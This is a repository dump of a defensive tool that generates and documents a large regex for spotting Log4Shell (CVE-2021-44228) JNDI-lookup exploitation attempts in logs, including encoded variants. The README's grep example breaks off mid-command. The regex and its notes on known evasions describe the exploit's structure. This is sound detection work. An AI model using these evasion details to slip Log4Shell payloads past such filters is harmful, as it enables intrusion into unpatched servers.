├── .gitignore ├── Alphabet ├── Alphabet.java ├── README.md ├── README.sh ├── RegEx_Generator.sh ├── screenshots ├── example_1.png ├── example_2.png ├── example_3.png ├── example_4a.png ├── example_4b.png ├── example_4c.jpeg ├── viz_4.png └── viz_4.svg └── testdata └── cve-2021-44228.csv /.gitignore: -------------------------------------------------------------------------------- 1 | *.class 2 | -------------------------------------------------------------------------------- /Alphabet: -------------------------------------------------------------------------------- 1 | # This alphabet is generated automatically 2 | # Changes need to be made in Alphabet.java 3 | dollar='(?:[\x24]|%(?:25%?)*24|\\u?0*(?:44|24))' 4 | curly_open='(?:[\x7b]|%(?:25%?)*7b|\\u?0*(?:7b|173))' 5 | colon='(?:[\x3a]|%(?:25%?)*3a|\\u?0*(?:72|3a))' 6 | slash='(?:[\x2f]|%(?:25%?)*2f|\\u?0*(?:57|2f))' 7 | a='(?:a|%(?:25%?)*(?:41|61)|\\u?0*(?:101|61|41|141))' 8 | b='(?:b|%(?:25%?)*(?:42|62)|\\u?0*(?:102|62|42|142))' 9 | c='(?:c|%(?:25%?)*(?:43|63)|\\u?0*(?:143|103|63|43))' 10 | d='(?:d|%(?:25%?)*(?:44|64)|\\u?0*(?:44|144|104|64))' 11 | e='(?:e|%(?:25%?)*(?:45|65)|\\u?0*(?:45|145|105|65))' 12 | f='(?:f|%(?:25%?)*(?:46|66)|\\u?0*(?:66|46|146|106))' 13 | g='(?:g|%(?:25%?)*(?:47|67)|\\u?0*(?:67|47|147|107))' 14 | h='(?:h|%(?:25%?)*(?:48|68)|\\u?0*(?:110|68|48|150))' 15 | i='(?:[i\x{130}\x{131}]|%(?:25%?)*(?:49|69|C4%(?:25%?)*B0|C4%(?:25%?)*B1)|\\u?0*(?:111|69|49|151|130|460|131|461))' 16 | j='(?:j|%(?:25%?)*(?:4a|6a)|\\u?0*(?:112|6a|4a|152))' 17 | k='(?:[k\x{212a}]|%(?:25%?)*(?:4b|6b|E2%(?:25%?)*84%(?:25%?)*AA)|\\u?0*(?:113|20452|212a|6b|4b|153))' 18 | l='(?:l|%(?:25%?)*(?:4c|6c)|\\u?0*(?:154|114|6c|4c))' 19 | m='(?:m|%(?:25%?)*(?:4d|6d)|\\u?0*(?:4d|155|115|6d))' 20 | n='(?:n|%(?:25%?)*(?:4e|6e)|\\u?0*(?:4e|156|116|6e))' 21 | o='(?:o|%(?:25%?)*(?:4f|6f)|\\u?0*(?:6f|4f|157|117))' 22 | p='(?:p|%(?:25%?)*(?:50|70)|\\u?0*(?:70|50|160|120))' 23 | q='(?:q|%(?:25%?)*(?:51|71)|\\u?0*(?:121|71|51|161))' 24 | r='(?:r|%(?:25%?)*(?:52|72)|\\u?0*(?:122|72|52|162))' 25 | s='(?:[s\x{17f}]|%(?:25%?)*(?:53|73|C5%(?:25%?)*BF)|\\u?0*(?:17f|123|577|73|53|163))' 26 | t='(?:t|%(?:25%?)*(?:54|74)|\\u?0*(?:124|74|54|164))' 27 | u='(?:u|%(?:25%?)*(?:55|75)|\\u?0*(?:55|165|125|75))' 28 | v='(?:v|%(?:25%?)*(?:56|76)|\\u?0*(?:56|166|126|76))' 29 | w='(?:w|%(?:25%?)*(?:57|77)|\\u?0*(?:77|57|167|127))' 30 | x='(?:x|%(?:25%?)*(?:58|78)|\\u?0*(?:78|58|170|130))' 31 | y='(?:y|%(?:25%?)*(?:59|79)|\\u?0*(?:79|59|171|131))' 32 | z='(?:z|%(?:25%?)*(?:5a|7a)|\\u?0*(?:132|7a|5a|172))' 33 | -------------------------------------------------------------------------------- /Alphabet.java: -------------------------------------------------------------------------------- 1 | import java.util.ArrayList; 2 | import java.util.HashSet; 3 | import java.net.URLEncoder; 4 | 5 | public class Alphabet { 6 | 7 | private ArrayList letters = null; 8 | 9 | public static void main(String[] args) { 10 | 11 | try { 12 | Alphabet alphabet = new Alphabet(); 13 | 14 | System.out.println("# This alphabet is generated automatically"); 15 | System.out.println("# Changes need to be made in Alphabet.java"); 16 | System.out.println(alphabet); 17 | } catch (Letter.NonLowerCaseLetterException e) { 18 | // Using System.*.println for logging, out of a reason... ;-) 19 | System.err.println("[ERROR] Make sure the alphabet class only contains a lower case alphabet."); 20 | System.exit(1); 21 | } 22 | 23 | } 24 | 25 | public Alphabet() throws Letter.NonLowerCaseLetterException { 26 | this.letters = new ArrayList<>(); 27 | 28 | // Adding spicial characters to the alphabet 29 | this.letters.add(new Letter("dollar", '$')); 30 | this.letters.add(new Letter("curly_open", '{')); 31 | this.letters.add(new Letter("colon", ':')); 32 | this.letters.add(new Letter("slash", '/')); 33 | 34 | // Adding all literals to the alphabet 35 | char[] literals = { 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 36 | 's', 't', 'u', 'v', 'w', 'x', 'y', 'z' }; 37 | for (int i = 0; i < literals.length; ++i) { 38 | Letter letter = new Letter(literals[i], literals[i]); 39 | this.letters.add(letter); 40 | } 41 | } 42 | 43 | public String toString() { 44 | StringBuilder sb = null; 45 | 46 | for (Letter letter : this.letters) { 47 | if (sb != null) { 48 | sb.append(System.lineSeparator()); 49 | } else { 50 | sb = new StringBuilder(); 51 | } 52 | 53 | sb.append(letter.toString()); 54 | 55 | } 56 | 57 | if (sb != null) { 58 | return sb.toString(); 59 | } else { 60 | return ""; 61 | } 62 | } 63 | 64 | private class Letter { 65 | 66 | private String myName; 67 | private char myChar; 68 | private ArrayList codePoints = null; 69 | 70 | public Letter(char name, char c) throws NonLowerCaseLetterException { 71 | this(String.valueOf(name), c); 72 | } 73 | 74 | public Letter(String name, char c) throws NonLowerCaseLetterException { 75 | if (c == Character.toLowerCase(c)) { 76 | myName = name; 77 | myChar = c; 78 | 79 | initCodePoints(); 80 | } else { 81 | throw new NonLowerCaseLetterException(); 82 | } 83 | } 84 | 85 | public String toString() { 86 | StringBuilder sb = new StringBuilder(); 87 | 88 | sb.append(this.myName + "='(?:"); 89 | sb.append(regExPlainLetter()); 90 | sb.append("|"); 91 | sb.append(regExUrlEncoded()); 92 | sb.append("|"); 93 | sb.append(regExUnicodeOctal()); 94 | sb.append(")'"); 95 | 96 | return sb.toString(); 97 | } 98 | 99 | private String regExPlainLetter() { 100 | StringBuilder sb = null; 101 | for (Integer codePoint : this.codePoints) { 102 | if (sb == null) { 103 | sb = new StringBuilder(); 104 | } 105 | 106 | String hex = Integer.toHexString(codePoint); 107 | String str = String.valueOf((char) (int) codePoint); 108 | if (str.matches("[a-z0-9]")) { 109 | sb.append(str); 110 | } else if (str.matches("[A-Z]")) { 111 | // We only add the lower case version and make the RegEx case insensitive (?i) 112 | } else if (hex.length() == 2) { 113 | sb.append("\\x" + hex); 114 | } else { 115 | sb.append("\\x{" + hex + "}"); 116 | } 117 | } 118 | 119 | if (sb != null) { 120 | String str = sb.toString(); 121 | if (str.length() > 1) { 122 | return "[" + str + "]"; 123 | } else { 124 | return str; 125 | } 126 | } else { 127 | return ""; 128 | } 129 | } 130 | 131 | private String regExUrlEncoded() { 132 | StringBuilder sb = null; 133 | 134 | for (Integer codePoint : this.codePoints) { 135 | if (sb != null) { 136 | sb.append("|"); 137 | } else { 138 | sb = new StringBuilder(); 139 | } 140 | 141 | String encoded; 142 | 143 | if (codePoint <= 255) { 144 | // For UTF-8 just encode as hex 145 | encoded = Integer.toHexString(codePoint); 146 | } else { 147 | // Handle UTF-16 148 | char ch = (char) (int) codePoint; 149 | String st = String.valueOf(ch); 150 | try { 151 | encoded = URLEncoder.encode(st, "UTF-8").substring(1); 152 | encoded = encoded.replace("%", "%(?:25%?)*"); 153 | } catch (java.io.UnsupportedEncodingException e) { 154 | throw new AssertionError("UTF-8 is unknown"); 155 | } 156 | } 157 | 158 | sb.append(encoded); 159 | } 160 | 161 | if (sb != null) { 162 | String str = sb.toString(); 163 | if (str.split("\\|", 2).length == 1) { 164 | return "%(?:25%?)*" + str; 165 | } else { 166 | return "%(?:25%?)*(?:" + str + ")"; 167 | } 168 | } else { 169 | return ""; 170 | } 171 | } 172 | 173 | private String regExUnicodeOctal() { 174 | HashSet list = new HashSet<>(); 175 | 176 | for (int codePoint : this.codePoints) { 177 | list.add(Integer.toHexString(codePoint)); 178 | list.add(Integer.toOctalString(codePoint)); 179 | } 180 | 181 | StringBuilder sb = new StringBuilder(); 182 | sb.append("\\\\u?0*(?:"); 183 | sb.append(String.join("|", list)); 184 | sb.append(")"); 185 | 186 | return sb.toString(); 187 | } 188 | 189 | private void initCodePoints() { 190 | this.codePoints = new ArrayList<>(); 191 | 192 | // Iterate over all Unicode code points from 0000 ... ffff 193 | for (int codePoint = 0; codePoint <= 65535; ++codePoint) { 194 | char literal = Character.toChars(codePoint)[0]; 195 | char literalUpper = Character.toUpperCase(literal); 196 | 197 | if (Character.toLowerCase(literal) == this.myChar 198 | || Character.toLowerCase(literalUpper) == this.myChar) { 199 | this.codePoints.add(codePoint); 200 | } 201 | } 202 | } 203 | 204 | public static class NonLowerCaseLetterException extends Exception { 205 | 206 | } 207 | } 208 | 209 | } 210 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Log4Shell-Rex 2 | 3 | The following RegEx was written in an attempt to match indicators of a Log4Shell (CVE-2021-44228 and 4 | CVE-2021-45046) exploitation. 5 | 6 | **If you run a version from pre 2021/12/21, it's highly recommended to test and update.**\ 7 | I've removed some quirks and enhanced performance. 8 | 9 | The Regex aims being PCRE compatible, but should also run on re2 and potentially more RegEx engines. 10 | 11 | **RegEx:** 12 | ```regex 13 | (?im)(?:^|[\n]).*?(?:[\x24]|%(?:25%?)*24|\\u?0*(?:44|24))(?:[\x7b]|%(?:25%?)*7b|\\u?0*(?:7b|173))[^\n]*?((?:j|%(?:25%?)*(?:4a|6a)|\\u?0*(?:112|6a|4a|152))[^\n]*?(?:n|%(?:25%?)*(?:4e|6e)|\\u?0*(?:4e|156|116|6e))[^\n]*?(?:d|%(?:25%?)*(?:44|64)|\\u?0*(?:44|144|104|64))[^\n]*?(?:[i\x{130}\x{131}]|%(?:25%?)*(?:49|69|C4%(?:25%?)*B0|C4%(?:25%?)*B1)|\\u?0*(?:111|69|49|151|130|460|131|461))[^\n]*?(?:[\x3a]|%(?:25%?)*3a|\\u?0*(?:72|3a))[^\n]*?((?:l|%(?:25%?)*(?:4c|6c)|\\u?0*(?:154|114|6c|4c))[^\n]*?(?:d|%(?:25%?)*(?:44|64)|\\u?0*(?:44|144|104|64))[^\n]*?(?:a|%(?:25%?)*(?:41|61)|\\u?0*(?:101|61|41|141))[^\n]*?(?:p|%(?:25%?)*(?:50|70)|\\u?0*(?:70|50|160|120))(?:[^\n]*?(?:[s\x{17f}]|%(?:25%?)*(?:53|73|C5%(?:25%?)*BF)|\\u?0*(?:17f|123|577|73|53|163)))?|(?:r|%(?:25%?)*(?:52|72)|\\u?0*(?:122|72|52|162))[^\n]*?(?:m|%(?:25%?)*(?:4d|6d)|\\u?0*(?:4d|155|115|6d))[^\n]*?(?:[i\x{130}\x{131}]|%(?:25%?)*(?:49|69|C4%(?:25%?)*B0|C4%(?:25%?)*B1)|\\u?0*(?:111|69|49|151|130|460|131|461))|(?:d|%(?:25%?)*(?:44|64)|\\u?0*(?:44|144|104|64))[^\n]*?(?:n|%(?:25%?)*(?:4e|6e)|\\u?0*(?:4e|156|116|6e))[^\n]*?(?:[s\x{17f}]|%(?:25%?)*(?:53|73|C5%(?:25%?)*BF)|\\u?0*(?:17f|123|577|73|53|163))|(?:n|%(?:25%?)*(?:4e|6e)|\\u?0*(?:4e|156|116|6e))[^\n]*?(?:[i\x{130}\x{131}]|%(?:25%?)*(?:49|69|C4%(?:25%?)*B0|C4%(?:25%?)*B1)|\\u?0*(?:111|69|49|151|130|460|131|461))[^\n]*?(?:[s\x{17f}]|%(?:25%?)*(?:53|73|C5%(?:25%?)*BF)|\\u?0*(?:17f|123|577|73|53|163))|(?:[^\n]*?(?:[i\x{130}\x{131}]|%(?:25%?)*(?:49|69|C4%(?:25%?)*B0|C4%(?:25%?)*B1)|\\u?0*(?:111|69|49|151|130|460|131|461))){2}[^\n]*?(?:o|%(?:25%?)*(?:4f|6f)|\\u?0*(?:6f|4f|157|117))[^\n]*?(?:p|%(?:25%?)*(?:50|70)|\\u?0*(?:70|50|160|120))|(?:c|%(?:25%?)*(?:43|63)|\\u?0*(?:143|103|63|43))[^\n]*?(?:o|%(?:25%?)*(?:4f|6f)|\\u?0*(?:6f|4f|157|117))[^\n]*?(?:r|%(?:25%?)*(?:52|72)|\\u?0*(?:122|72|52|162))[^\n]*?(?:b|%(?:25%?)*(?:42|62)|\\u?0*(?:102|62|42|142))[^\n]*?(?:a|%(?:25%?)*(?:41|61)|\\u?0*(?:101|61|41|141))|(?:n|%(?:25%?)*(?:4e|6e)|\\u?0*(?:4e|156|116|6e))[^\n]*?(?:d|%(?:25%?)*(?:44|64)|\\u?0*(?:44|144|104|64))[^\n]*?(?:[s\x{17f}]|%(?:25%?)*(?:53|73|C5%(?:25%?)*BF)|\\u?0*(?:17f|123|577|73|53|163))|(?:h|%(?:25%?)*(?:48|68)|\\u?0*(?:110|68|48|150))(?:[^\n]*?(?:t|%(?:25%?)*(?:54|74)|\\u?0*(?:124|74|54|164))){2}[^\n]*?(?:p|%(?:25%?)*(?:50|70)|\\u?0*(?:70|50|160|120))(?:[^\n]*?(?:[s\x{17f}]|%(?:25%?)*(?:53|73|C5%(?:25%?)*BF)|\\u?0*(?:17f|123|577|73|53|163)))?)[^\n]*?(?:[\x3a]|%(?:25%?)*3a|\\u?0*(?:72|3a))|(?:b|%(?:25%?)*(?:42|62)|\\u?0*(?:102|62|42|142))[^\n]*?(?:a|%(?:25%?)*(?:41|61)|\\u?0*(?:101|61|41|141))[^\n]*?(?:[s\x{17f}]|%(?:25%?)*(?:53|73|C5%(?:25%?)*BF)|\\u?0*(?:17f|123|577|73|53|163))[^\n]*?(?:e|%(?:25%?)*(?:45|65)|\\u?0*(?:45|145|105|65))[^\n]*?(?:[\x3a]|%(?:25%?)*3a|\\u?0*(?:72|3a))(JH[s-v]|[\x2b\x2f-9A-Za-z][CSiy]R7|[\x2b\x2f-9A-Za-z]{2}[048AEIMQUYcgkosw]ke[\x2b\x2f-9w-z])) 14 | ``` 15 | 16 | ## Capabilities 17 | 18 | By now, this regex should match the exploit, regardless: 19 | 20 | - Just logged 21 | - Case insensitive (also in all supported encodings) 22 | - URL Encoded 23 | - Recursively URL Encoded 24 | - With Unicode encoding 25 | - With Octal encoding 26 | - Base64 encoded (rudimentary) 27 | 28 | ### Background 29 | 30 | The goal is to have a RegEx that represents a reasonable tradeoff between detecting as many attack 31 | attempts as possible with an acceptable number of false positives. 32 | 33 | The APT attacker will find a way around if necessary, but less elaborate attacks will leave the 34 | warning light on. 35 | 36 | Why a (single) RegEx: Because it can be easily executed on the CLI or in a SIEM without any 37 | additional tools. If tools can be executed, do it, they exist. 38 | 39 | The length of the regex is less of a problem than its performance. Despite the length, the RegEx 40 | should be acceptably fast to execute on average log data. 41 | 42 | ### Call for action 43 | 44 | I wanna make it hard to hide an attack in real world szenarios. 45 | 46 | If this RegEx does not match sth. you have seen in the wild or can show being exploitable, please 47 | create an issue. 48 | 49 | It is known, that you can work around the RegEx easily by encoding different parts of the attack 50 | pattern using Base64. How ever, this is accepted, as `base64` did not finaly made it into an 51 | official Log4j release yet. ([LOG4J2-2446](https://issues.apache.org/jira/projects/LOG4J2/issues/LOG4J2-2446)) 52 | 53 | ### Tools 54 | 55 | - Test the RegEx: **[regex101](https://regex101.com/r/KqGG3W/24)** 56 | - Visualize the Regex: **[REGEXPER](https://regexper.com/#%28%3F%3A%5E%7C%5B%5Cn%5D%29.*%3F%28%3F%3A%5B%5Cx24%5D%7C%25%28%3F%3A25%25%3F%29*24%7C%5C%5Cu%3F0*%28%3F%3A44%7C24%29%29%28%3F%3A%5B%5Cx7b%5D%7C%25%28%3F%3A25%25%3F%29*7b%7C%5C%5Cu%3F0*%28%3F%3A7b%7C173%29%29%5B%5E%5Cn%5D*%3F%28%28%3F%3Aj%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A4a%7C6a%29%7C%5C%5Cu%3F0*%28%3F%3A112%7C6a%7C4a%7C152%29%29%5B%5E%5Cn%5D*%3F%28%3F%3An%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A4e%7C6e%29%7C%5C%5Cu%3F0*%28%3F%3A4e%7C156%7C116%7C6e%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Ad%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A44%7C64%29%7C%5C%5Cu%3F0*%28%3F%3A44%7C144%7C104%7C64%29%29%5B%5E%5Cn%5D*%3F%28%3F%3A%5Bi%5Cx%7B130%7D%5Cx%7B131%7D%5D%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A49%7C69%7CC4%25%28%3F%3A25%25%3F%29*B0%7CC4%25%28%3F%3A25%25%3F%29*B1%29%7C%5C%5Cu%3F0*%28%3F%3A111%7C69%7C49%7C151%7C130%7C460%7C131%7C461%29%29%5B%5E%5Cn%5D*%3F%28%3F%3A%5B%5Cx3a%5D%7C%25%28%3F%3A25%25%3F%29*3a%7C%5C%5Cu%3F0*%28%3F%3A72%7C3a%29%29%5B%5E%5Cn%5D*%3F%28%28%3F%3Al%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A4c%7C6c%29%7C%5C%5Cu%3F0*%28%3F%3A154%7C114%7C6c%7C4c%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Ad%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A44%7C64%29%7C%5C%5Cu%3F0*%28%3F%3A44%7C144%7C104%7C64%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Aa%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A41%7C61%29%7C%5C%5Cu%3F0*%28%3F%3A101%7C61%7C41%7C141%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Ap%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A50%7C70%29%7C%5C%5Cu%3F0*%28%3F%3A70%7C50%7C160%7C120%29%29%28%3F%3A%5B%5E%5Cn%5D*%3F%28%3F%3A%5Bs%5Cx%7B17f%7D%5D%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A53%7C73%7CC5%25%28%3F%3A25%25%3F%29*BF%29%7C%5C%5Cu%3F0*%28%3F%3A17f%7C123%7C577%7C73%7C53%7C163%29%29%29%3F%7C%28%3F%3Ar%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A52%7C72%29%7C%5C%5Cu%3F0*%28%3F%3A122%7C72%7C52%7C162%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Am%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A4d%7C6d%29%7C%5C%5Cu%3F0*%28%3F%3A4d%7C155%7C115%7C6d%29%29%5B%5E%5Cn%5D*%3F%28%3F%3A%5Bi%5Cx%7B130%7D%5Cx%7B131%7D%5D%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A49%7C69%7CC4%25%28%3F%3A25%25%3F%29*B0%7CC4%25%28%3F%3A25%25%3F%29*B1%29%7C%5C%5Cu%3F0*%28%3F%3A111%7C69%7C49%7C151%7C130%7C460%7C131%7C461%29%29%7C%28%3F%3Ad%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A44%7C64%29%7C%5C%5Cu%3F0*%28%3F%3A44%7C144%7C104%7C64%29%29%5B%5E%5Cn%5D*%3F%28%3F%3An%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A4e%7C6e%29%7C%5C%5Cu%3F0*%28%3F%3A4e%7C156%7C116%7C6e%29%29%5B%5E%5Cn%5D*%3F%28%3F%3A%5Bs%5Cx%7B17f%7D%5D%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A53%7C73%7CC5%25%28%3F%3A25%25%3F%29*BF%29%7C%5C%5Cu%3F0*%28%3F%3A17f%7C123%7C577%7C73%7C53%7C163%29%29%7C%28%3F%3An%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A4e%7C6e%29%7C%5C%5Cu%3F0*%28%3F%3A4e%7C156%7C116%7C6e%29%29%5B%5E%5Cn%5D*%3F%28%3F%3A%5Bi%5Cx%7B130%7D%5Cx%7B131%7D%5D%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A49%7C69%7CC4%25%28%3F%3A25%25%3F%29*B0%7CC4%25%28%3F%3A25%25%3F%29*B1%29%7C%5C%5Cu%3F0*%28%3F%3A111%7C69%7C49%7C151%7C130%7C460%7C131%7C461%29%29%5B%5E%5Cn%5D*%3F%28%3F%3A%5Bs%5Cx%7B17f%7D%5D%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A53%7C73%7CC5%25%28%3F%3A25%25%3F%29*BF%29%7C%5C%5Cu%3F0*%28%3F%3A17f%7C123%7C577%7C73%7C53%7C163%29%29%7C%28%3F%3A%5B%5E%5Cn%5D*%3F%28%3F%3A%5Bi%5Cx%7B130%7D%5Cx%7B131%7D%5D%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A49%7C69%7CC4%25%28%3F%3A25%25%3F%29*B0%7CC4%25%28%3F%3A25%25%3F%29*B1%29%7C%5C%5Cu%3F0*%28%3F%3A111%7C69%7C49%7C151%7C130%7C460%7C131%7C461%29%29%29%7B2%7D%5B%5E%5Cn%5D*%3F%28%3F%3Ao%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A4f%7C6f%29%7C%5C%5Cu%3F0*%28%3F%3A6f%7C4f%7C157%7C117%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Ap%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A50%7C70%29%7C%5C%5Cu%3F0*%28%3F%3A70%7C50%7C160%7C120%29%29%7C%28%3F%3Ac%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A43%7C63%29%7C%5C%5Cu%3F0*%28%3F%3A143%7C103%7C63%7C43%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Ao%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A4f%7C6f%29%7C%5C%5Cu%3F0*%28%3F%3A6f%7C4f%7C157%7C117%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Ar%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A52%7C72%29%7C%5C%5Cu%3F0*%28%3F%3A122%7C72%7C52%7C162%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Ab%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A42%7C62%29%7C%5C%5Cu%3F0*%28%3F%3A102%7C62%7C42%7C142%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Aa%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A41%7C61%29%7C%5C%5Cu%3F0*%28%3F%3A101%7C61%7C41%7C141%29%29%7C%28%3F%3An%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A4e%7C6e%29%7C%5C%5Cu%3F0*%28%3F%3A4e%7C156%7C116%7C6e%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Ad%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A44%7C64%29%7C%5C%5Cu%3F0*%28%3F%3A44%7C144%7C104%7C64%29%29%5B%5E%5Cn%5D*%3F%28%3F%3A%5Bs%5Cx%7B17f%7D%5D%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A53%7C73%7CC5%25%28%3F%3A25%25%3F%29*BF%29%7C%5C%5Cu%3F0*%28%3F%3A17f%7C123%7C577%7C73%7C53%7C163%29%29%7C%28%3F%3Ah%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A48%7C68%29%7C%5C%5Cu%3F0*%28%3F%3A110%7C68%7C48%7C150%29%29%28%3F%3A%5B%5E%5Cn%5D*%3F%28%3F%3At%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A54%7C74%29%7C%5C%5Cu%3F0*%28%3F%3A124%7C74%7C54%7C164%29%29%29%7B2%7D%5B%5E%5Cn%5D*%3F%28%3F%3Ap%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A50%7C70%29%7C%5C%5Cu%3F0*%28%3F%3A70%7C50%7C160%7C120%29%29%28%3F%3A%5B%5E%5Cn%5D*%3F%28%3F%3A%5Bs%5Cx%7B17f%7D%5D%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A53%7C73%7CC5%25%28%3F%3A25%25%3F%29*BF%29%7C%5C%5Cu%3F0*%28%3F%3A17f%7C123%7C577%7C73%7C53%7C163%29%29%29%3F%29%5B%5E%5Cn%5D*%3F%28%3F%3A%5B%5Cx3a%5D%7C%25%28%3F%3A25%25%3F%29*3a%7C%5C%5Cu%3F0*%28%3F%3A72%7C3a%29%29%7C%28%3F%3Ab%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A42%7C62%29%7C%5C%5Cu%3F0*%28%3F%3A102%7C62%7C42%7C142%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Aa%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A41%7C61%29%7C%5C%5Cu%3F0*%28%3F%3A101%7C61%7C41%7C141%29%29%5B%5E%5Cn%5D*%3F%28%3F%3A%5Bs%5Cx%7B17f%7D%5D%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A53%7C73%7CC5%25%28%3F%3A25%25%3F%29*BF%29%7C%5C%5Cu%3F0*%28%3F%3A17f%7C123%7C577%7C73%7C53%7C163%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Ae%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A45%7C65%29%7C%5C%5Cu%3F0*%28%3F%3A45%7C145%7C105%7C65%29%29%5B%5E%5Cn%5D*%3F%28%3F%3A%5B%5Cx3a%5D%7C%25%28%3F%3A25%25%3F%29*3a%7C%5C%5Cu%3F0*%28%3F%3A72%7C3a%29%29%28JH%5Bs-v%5D%7C%5B%5Cx2b%5Cx2f-9A-Za-z%5D%5BCSiy%5DR7%7C%5B%5Cx2b%5Cx2f-9A-Za-z%5D%7B2%7D%5B048AEIMQUYcgkosw%5Dke%5B%5Cx2b%5Cx2f-9w-z%5D%29%29)** 57 | 58 | ## Hunting on your Linux machine 59 | 60 | ### On the CLI with `grep` 61 | 62 | ```bash 63 | eval "$(./RegEx_Generator.sh)" 64 | grep -P ${Log4ShellRex} 65 | ``` 66 | 67 | ```bash 68 | grep -P '(?im)(?:^|[\n]).*?(?:[\x24]|%(?:25%?)*24|\\u?0*(?:44|24))(?:[\x7b]|%(?:25%?)*7b|\\u?0*(?:7b|173))[^\n]*?((?:j|%(?:25%?)*(?:4a|6a)|\\u?0*(?:112|6a|4a|152))[^\n]*?(?:n|%(?:25%?)*(?:4e|6e)|\\u?0*(?:4e|156|116|6e))[^\n]*?(?:d|%(?:25%?)*(?:44|64)|\\u?0*(?:44|144|104|64))[^\n]*?(?:[i\x{130}\x{131}]|%(?:25%?)*(?:49|69|C4%(?:25%?)*B0|C4%(?:25%?)*B1)|\\u?0*(?:111|69|49|151|130|460|131|461))[^\n]*?(?:[\x3a]|%(?:25%?)*3a|\\u?0*(?:72|3a))[^\n]*?((?:l|%(?:25%?)*(?:4c|6c)|\\u?0*(?:154|114|6c|4c))[^\n]*?(?:d|%(?:25%?)*(?:44|64)|\\u?0*(?:44|144|104|64))[^\n]*?(?:a|%(?:25%?)*(?:41|61)|\\u?0*(?:101|61|41|141))[^\n]*?(?:p|%(?:25%?)*(?:50|70)|\\u?0*(?:70|50|160|120))(?:[^\n]*?(?:[s\x{17f}]|%(?:25%?)*(?:53|73|C5%(?:25%?)*BF)|\\u?0*(?:17f|123|577|73|53|163)))?|(?:r|%(?:25%?)*(?:52|72)|\\u?0*(?:122|72|52|162))[^\n]*?(?:m|%(?:25%?)*(?:4d|6d)|\\u?0*(?:4d|155|115|6d))[^\n]*?(?:[i\x{130}\x{131}]|%(?:25%?)*(?:49|69|C4%(?:25%?)*B0|C4%(?:25%?)*B1)|\\u?0*(?:111|69|49|151|130|460|131|461))|(?:d|%(?:25%?)*(?:44|64)|\\u?0*(?:44|144|104|64))[^\n]*?(?:n|%(?:25%?)*(?:4e|6e)|\\u?0*(?:4e|156|116|6e))[^\n]*?(?:[s\x{17f}]|%(?:25%?)*(?:53|73|C5%(?:25%?)*BF)|\\u?0*(?:17f|123|577|73|53|163))|(?:n|%(?:25%?)*(?:4e|6e)|\\u?0*(?:4e|156|116|6e))[^\n]*?(?:[i\x{130}\x{131}]|%(?:25%?)*(?:49|69|C4%(?:25%?)*B0|C4%(?:25%?)*B1)|\\u?0*(?:111|69|49|151|130|460|131|461))[^\n]*?(?:[s\x{17f}]|%(?:25%?)*(?:53|73|C5%(?:25%?)*BF)|\\u?0*(?:17f|123|577|73|53|163))|(?:[^\n]*?(?:[i\x{130}\x{131}]|%(?:25%?)*(?:49|69|C4%(?:25%?)*B0|C4%(?:25%?)*B1)|\\u?0*(?:111|69|49|151|130|460|131|461))){2}[^\n]*?(?:o|%(?:25%?)*(?:4f|6f)|\\u?0*(?:6f|4f|157|117))[^\n]*?(?:p|%(?:25%?)*(?:50|70)|\\u?0*(?:70|50|160|120))|(?:c|%(?:25%?)*(?:43|63)|\\u?0*(?:143|103|63|43))[^\n]*?(?:o|%(?:25%?)*(?:4f|6f)|\\u?0*(?:6f|4f|157|117))[^\n]*?(?:r|%(?:25%?)*(?:52|72)|\\u?0*(?:122|72|52|162))[^\n]*?(?:b|%(?:25%?)*(?:42|62)|\\u?0*(?:102|62|42|142))[^\n]*?(?:a|%(?:25%?)*(?:41|61)|\\u?0*(?:101|61|41|141))|(?:n|%(?:25%?)*(?:4e|6e)|\\u?0*(?:4e|156|116|6e))[^\n]*?(?:d|%(?:25%?)*(?:44|64)|\\u?0*(?:44|144|104|64))[^\n]*?(?:[s\x{17f}]|%(?